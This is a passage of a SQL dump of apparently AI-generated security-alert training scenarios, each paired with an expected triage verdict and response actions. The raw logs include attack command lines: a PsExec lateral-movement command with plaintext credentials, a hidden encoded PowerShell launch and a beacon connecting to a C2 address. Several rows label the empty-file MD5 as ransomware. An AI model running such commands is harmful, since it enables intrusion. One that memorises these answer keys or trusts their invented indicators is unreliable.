'{\"timestamp\":\"2026-01-11T08:45:21Z\",\"event_type\":\"network_connection\",\"src_ip\":\"10.0.0.15\",\"dst_ip\":\"203.0.113.45\",\"username\":\"jdoe\",\"hostname\":\"CORP-SERVER01\",\"command_line\":\"C:\\\\Windows\\\\System32\\\\svchost.exe -k netsvcs\",\"file_hash\":\"3c8a3f7d8f9f4b3a4e8d7c9b5e9f2d1f\"}', '2026-01-10 04:57:56', '2026-01-11 14:59:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for C2 activities associated with ransomware\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"3c8a3f7d8f9f4b3a4e8d7c9b5e9f2d1f\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash identified as a Cobalt Strike payload\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised machine\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"Cobalt Strike beacon activity detected from internal server communicating with known ransomware-associated IP.\"}', 'Expert', 'EDR', 9, 1, 'GOVERNMENT'), (684, 'Suspicious Email Detected - Potential Phishing', 'high', 'Proofpoint', 'An email purporting to be from a trusted source contained a link to a known phishing domain. The email was flagged due to domain spoofing and suspicious attachments.', 'Phishing', 'T1566', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T09:30:45Z\",\"event_type\":\"email_received\",\"src_ip\":\"198.51.100.23\",\"dst_ip\":\"10.0.0.25\",\"username\":\"asanchez\",\"hostname\":\"USER-LAPTOP02\",\"email_sender\":\"no-reply@trustedsource.com\",\"url\":\"http://phishing-link.example.com\"}', '2026-01-10 12:47:27', '2026-01-11 14:59:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"no-reply@trustedsource.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Email domain does not match known trusted sources\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://phishing-link.example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Known phishing domain targeting financial credentials\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 120 times for sending phishing emails\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"Email contained a link to a known phishing domain and originated from a suspicious IP.\"}', 'Expert', 'NDR', 9, 1, 'FINANCE'), (685, 'False Positive: Unusual Network Scanning Activity', 'medium', 'Wazuh', 'A network scanning tool was detected running on an internal server. Analysis revealed it was part of a scheduled vulnerability assessment.', 'Network Activity', 'T1046', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T07:15:33Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.30\",\"dst_ip\":\"10.0.0.50\",\"username\":\"admin\",\"hostname\":\"INTERNAL-SCAN01\",\"command_line\":\"nmap -sV 10.0.0.50\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}', '2026-01-11 12:38:44', '2026-01-11 14:59:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"nmap -sV 10.0.0.50\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Command execution aligns with scheduled vulnerability scanning\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.30\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of authorized scanner\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"10.0.0.50\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of scanned server\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"network_activity\",\"analysis_notes\":\"The activity corresponds to an authorized vulnerability scan and is not malicious.\"}', 'Expert', 'EDR', 9, 1, 'OT_ICS'), (686, 'BlackCat/ALPHV Ransomware Pre-Encryption Reconnaissance Detected', 'critical', 'Splunk', 'Pre-encryption reconnaissance activities linked to the BlackCat/ALPHV ransomware group were detected. Attackers used PsExec for lateral movement within the network.', 'Lateral Movement', 'T1047', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T10:05:10Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.15\",\"dst_ip\":\"10.0.0.45\",\"username\":\"administrator\",\"hostname\":\"CORP-SERVER01\",\"command_line\":\"PsExec.exe \\\\\\\\10.0.0.45 -u administrator -p password cmd.exe\"}', '2026-01-10 02:32:48', '2026-01-11 14:59:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"PsExec.exe \\\\\\\\10.0.0.45 -u administrator -p password cmd.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"PsExec usage consistent with lateral movement by ransomware groups\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised machine\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"10.0.0.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of target machine\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"PsExec detected being used for lateral movement indicative of ransomware pre-encryption reconnaissance.\"}', 'Expert', 'EDR', 9, 1, 'OT_ICS'), (687, 'Brute Force Attack Detected on RDP Service', 'high', 'Wazuh', 'Multiple failed login attempts detected from an external IP address targeting the RDP service on the network. The source IP is associated with known malicious activity.', 'Credential Attack', 'T1110', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T08:15:24Z\",\"event_type\":\"login_failure\",\"src_ip\":\"185.92.26.102\",\"dst_ip\":\"192.168.1.10\",\"username\":\"administrator\",\"hostname\":\"corp-server-01\",\"failed_attempts\":35}', '2026-01-11 02:30:22', '2026-01-11 15:02:20', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.92.26.102\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for brute force attacks\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal network address\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"administrator\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Common username for administrative access\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The external IP has a high number of reports related to brute force activity, confirming this is a legitimate attack.\"}', 'Novice', 'SIEM', 1, 1, 'GOVERNMENT'), (688, 'Malware Detected - LockBit 3.0 Ransomware', 'critical', 'CrowdStrike', 'A known ransomware file associated with LockBit 3.0 was executed on a corporate workstation. The file hash matches a known malicious signature.', 'Malware', 'T1486', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T10:37:45Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.15\",\"hostname\":\"workstation-05\",\"command_line\":\"C:\\\\Users\\\\User\\\\Downloads\\\\ransom.exe\",\"file_hash\":\"f2d2c3e2345fabc1234567890defabc1234567890abcd1234567890efab1234c\"}', '2026-01-10 08:45:54', '2026-01-11 15:02:20', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal network address\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"f2d2c3e2345fabc1234567890defabc1234567890abcd1234567890efab1234c\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Detected by 55 antivirus engines as LockBit 3.0 ransomware\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"C:\\\\Users\\\\User\\\\Downloads\\\\ransom.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Executable associated with ransomware deployment\"}}],\"expected_actions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The file hash is confirmed malicious with a high detection rate on VirusTotal, indicating a true positive ransomware attack.\"}', 'Novice', 'EDR', 1, 1, 'OT_ICS'), (689, 'Phishing Email Containing Malicious URL', 'medium', 'Proofpoint', 'A phishing email purporting to be from a legitimate service was received by a user. The email contains a URL leading to a fake login page.', 'Phishing', 'T1566', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T09:22:10Z\",\"event_type\":\"email_received\",\"email_sender\":\"no-reply@secure-login.com\",\"username\":\"jdoe\",\"hostname\":\"mailserver-01\",\"url\":\"http://malicious-login.com/login\"}', '2026-01-09 23:23:58', '2026-01-11 15:02:20', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"no-reply@secure-login.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"suspicious\",\"details\":\"Email sender domain detected in phishing campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://malicious-login.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL leads to a phishing page attempting to steal credentials\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal user account\"}}],\"expected_actions\":[\"block_url\",\"warn_user\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The URL in the email is confirmed malicious and is a known phishing site attempting to harvest credentials.\"}', 'Novice', 'SIEM', 1, 1, 'OT_ICS'), (690, 'Suspicious Network Connection from Internal System', 'low', 'Firewall', 'A network connection was observed from an internal system to an external IP address. The connection was flagged due to unusual activity patterns.', 'Network Anomaly', 'N/A', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T11:02:33Z\",\"event_type\":\"network_connection\",\"src_ip\":\"10.0.0.25\",\"dst_ip\":\"203.0.113.55\",\"hostname\":\"workstation-12\"}', '2026-01-10 14:41:41', '2026-01-11 15:02:20', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal network address\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.55\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"clean\",\"details\":\"No known malicious activity associated with this IP\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"network_anomaly\",\"analysis_notes\":\"The external IP has no malicious activity reports, indicating this is likely benign activity.\"}', 'Novice', 'NDR', 1, 1, 'GOVERNMENT'), (691, 'Ransomware Attack Detected via Cobalt Strike Beacon', 'critical', 'CrowdStrike', 'A Cobalt Strike beacon was detected on the network, originating from an external IP address known for malicious activity. The beacon was executed on a compromised internal machine, indicating potential ransomware deployment.', 'Malware', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T14:23:45Z\",\"event_type\":\"process_execution\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"10.0.0.25\",\"username\":\"jdoe\",\"hostname\":\"CORP-WS-123\",\"command_line\":\"C:\\\\Program Files\\\\Common Files\\\\cs.exe -connect 203.0.113.45:443\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}', '2026-01-09 17:36:25', '2026-01-11 15:03:28', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for hosting Cobalt Strike C2 servers.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised machine.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Cobalt Strike payloads.\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The presence of a Cobalt Strike beacon indicates an active attempt to deploy ransomware, necessitating immediate remediation.\"}', 'Beginner', 'EDR', 3, 1, 'OT_ICS'), (692, 'Suspicious Login Attempts Detected from Foreign IP', 'high', 'Wazuh', 'Multiple failed login attempts were detected from an IP address located in a region with no known business operations. This could indicate a potential brute force attack.', 'Brute Force', 'T1078', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T10:15:30Z\",\"event_type\":\"login_failure\",\"src_ip\":\"192.0.2.77\",\"username\":\"admin\",\"hostname\":\"CORP-SERVER-01\",\"failed_attempts\":25}', '2026-01-09 16:58:08', '2026-01-11 15:03:28', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.0.2.77\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP frequently reported for login brute force attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Commonly targeted username for brute force attacks.\"}},{\"id\":\"artifact_3\",\"type\":\"hostname\",\"value\":\"CORP-SERVER-01\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal server targeted by brute force attempts.\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The repeated failed login attempts from a suspicious IP address suggest a brute force attack.\"}', 'Beginner', 'SIEM', 3, 1, 'OT_ICS'), (693, 'Phishing Email with Malicious URL Detected', 'medium', 'Proofpoint', 'A phishing email was detected containing a malicious URL intended to harvest user credentials. The email was sent from a spoofed domain mimicking a trusted partner.', 'Phishing', 'T1566', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T08:45:20Z\",\"event_type\":\"email_received\",\"email_sender\":\"alerts@trusted-partner.com\",\"username\":\"asmith\",\"malicious_url\":\"http://malicious-url.com/login\"}', '2026-01-09 20:28:49', '2026-01-11 15:03:28', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"alerts@trusted-partner.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"EmailRep\",\"verdict\":\"suspicious\",\"details\":\"Email domain appears to be spoofed.\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://malicious-url.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL known for phishing attempts.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"asmith\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal user targeted by phishing attempt.\"}}],\"expected_actions\":[\"block_url\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The malicious URL and spoofed domain indicate a phishing attempt to steal user credentials.\"}', 'Beginner', 'SIEM', 3, 1, 'OT_ICS'), (694, 'Failed RDP Access from Known Safe IP', 'low', 'Firewall', 'A failed RDP access attempt was logged from an IP address previously whitelisted for remote connections. The activity appears to be benign.', 'Brute Force', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T12:30:50Z\",\"event_type\":\"login_failure\",\"src_ip\":\"198.51.100.23\",\"username\":\"mnguyen\",\"hostname\":\"CORP-RDP-SERVER\",\"failed_attempts\":3}', '2026-01-10 16:12:35', '2026-01-11 15:03:28', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Review\",\"verdict\":\"clean\",\"details\":\"IP address is whitelisted for remote access.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"mnguyen\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"User confirmed to have attempted RDP login.\"}},{\"id\":\"artifact_3\",\"type\":\"hostname\",\"value\":\"CORP-RDP-SERVER\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"RDP server receiving authorized connection attempts.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The source IP is whitelisted, indicating the failed login attempts are likely a result of user error rather than malicious intent.\"}', 'Beginner', 'SIEM', 3, 1, 'OT_ICS'); INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`) VALUES (695, 'LockBit Ransomware Detected via Cobalt Strike Beacon', 'critical', 'CrowdStrike', 'A Cobalt Strike beacon was detected communicating with a known LockBit ransomware command and control server. The affected machine is showing signs of ransomware infection.', 'Malware', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T03:45:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"10.0.15.23\",\"dst_ip\":\"185.199.110.153\",\"username\":\"jdoe\",\"hostname\":\"CORP-WKSTN-45\",\"command_line\":\"powershell.exe -nop -w hidden -enc aW5mbw==\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}', '2026-01-10 03:14:01', '2026-01-11 15:04:04', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.199.110.153\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"IP reported 1203 times for C2 activity\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.15.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised host\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"powershell.exe -nop -w hidden -enc aW5mbw==\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Encoded PowerShell command indicating potential malicious activity\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"File hash associated with LockBit ransomware\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The presence of a Cobalt Strike beacon and known ransomware file hash confirms the infection.\"}', 'Intermediate', 'EDR', 5, 1, 'OT_ICS'), (696, 'Suspicious RDP Login Attempts Detected', 'high', 'Wazuh', 'Multiple failed RDP login attempts detected from an external IP address. The attempts indicate a potential brute force attack.', 'Brute Force', 'T1110', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T10:15:45Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"192.168.1.10\",\"username\":\"admin\",\"hostname\":\"RDP-SERVER\",\"failed_attempts\":37}', '2026-01-09 18:53:30', '2026-01-11 15:04:04', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for brute force attacks\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of target server\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The high number of failed login attempts from a foreign IP suggests a brute force attack.\"}', 'Intermediate', 'SIEM', 5, 1, 'OT_ICS'), (697, 'ALPHV Ransomware Reconnaissance Activity Detected', 'medium', 'Splunk', 'Suspicious use of PsExec detected, indicating potential lateral movement associated with ALPHV ransomware.', 'Lateral Movement', 'T1077', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T02:30:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.12\",\"dst_ip\":\"10.0.0.23\",\"username\":\"svc_admin\",\"hostname\":\"CORP-SERVER-01\",\"command_line\":\"psexec.exe \\\\\\\\10.0.0.23 -u admin -p password123 cmd.exe\"}', '2026-01-11 13:49:48', '2026-01-11 15:04:04', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.12\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Source IP involved in lateral movement\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Destination IP involved in lateral movement\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"psexec.exe \\\\\\\\10.0.0.23 -u admin -p password123 cmd.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"PsExec usage for lateral movement\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"PsExec is commonly used for lateral movement, especially in ransomware operations.\"}', 'Intermediate', 'EDR', 5, 1, 'OT_ICS'), (698, 'False Positive: Legitimate User Activity Mistaken for Command Injection', 'low', 'IDS', 'An alert was triggered for a suspected command injection, but the activity was identified as a legitimate administrative task.', 'Web Attack', 'T1190', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T05:00:00Z\",\"event_type\":\"web_request\",\"src_ip\":\"192.168.2.15\",\"dst_ip\":\"192.168.2.20\",\"username\":\"admin\",\"hostname\":\"WEB-SERVER\",\"request_body\":\"ping -c 4 8.8.8.8 && echo test\",\"url\":\"http://192.168.2.20/admin/execute\"}', '2026-01-10 23:39:43', '2026-01-11 15:04:04', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.2.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Source IP of internal admin machine\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.2.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Web server internal IP\"}},{\"id\":\"artifact_3\",\"type\":\"payload\",\"value\":\"ping -c 4 8.8.8.8 && echo test\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Legitimate administrative command executed\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"web_attack\",\"analysis_notes\":\"Upon review, the command was identified as a routine administrative task, not malicious.\"}', 'Intermediate', 'EDR', 5, 1, 'OT_ICS'), (699, 'Suspicious PowerShell Execution with Encoded Commands', 'high', 'CrowdStrike', 'A PowerShell process was detected executing with encoded commands on an internal host. This is frequently used in obfuscation techniques by attackers.', 'Malware', 'T1059.001', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T15:42:56Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.1.20\",\"dst_ip\":\"\",\"username\":\"jdoe\",\"hostname\":\"DESKTOP-1A2B3C\",\"command_line\":\"powershell.exe -enc W3Bhd2Vyc2hlbGwuZXhlIC1jb21tYW5kIC1lbmMgU29tZUVuY29kZWRDb21tYW5k\",\"file_hash\":\"3b7b3c2a5c6a4f7b8b8b3a2c3b7c6a4f\"}', '2026-01-10 01:55:09', '2026-01-11 15:04:28', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"powershell.exe -enc W3Bhd2Vyc2hlbGwuZXhlIC1jb21tYW5kIC1lbmMgU29tZUVuY29kZWRDb21tYW5k\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Encoded PowerShell commands are often used in malicious scripts.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"3b7b3c2a5c6a4f7b8b8b3a2c3b7c6a4f\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"This hash is associated with potentially unwanted software.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"10.0.1.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"This is an internal IP address.\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\",\"block_hash\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"Encoded PowerShell commands indicate potential malware execution.\"}', 'Advanced', 'EDR', 7, 1, 'TECH'), (700, 'Unauthorized Access Attempt via RDP', 'critical', 'Splunk', 'Multiple failed RDP login attempts detected from an external IP address, suggesting a possible brute force attack.', 'Credential Attack', 'T1110', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T13:22:10Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"192.168.1.10\",\"username\":\"admin\",\"hostname\":\"RDP-SERVER\",\"failed_attempts\":25}', '2026-01-10 08:37:56', '2026-01-11 15:04:28', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for brute force attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"This is an internal IP address.\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"High number of failed login attempts from a known malicious IP indicates a brute force attack.\"}', 'Advanced', 'SIEM', 7, 1, 'OT_ICS'), (701, 'Suspicious Network Activity Detected', 'medium', 'Firewall', 'A large volume of data was transferred from an internal server to an unknown external IP, potentially indicating data exfiltration.', 'Data Exfiltration', 'T1041', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T16:30:45Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.25\",\"dst_ip\":\"198.51.100.75\",\"bytes_transferred\":10485760,\"hostname\":\"FILE-SERVER\"}', '2026-01-11 09:55:46', '2026-01-11 15:04:28', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.75\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"IP associated with previous data exfiltration activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal 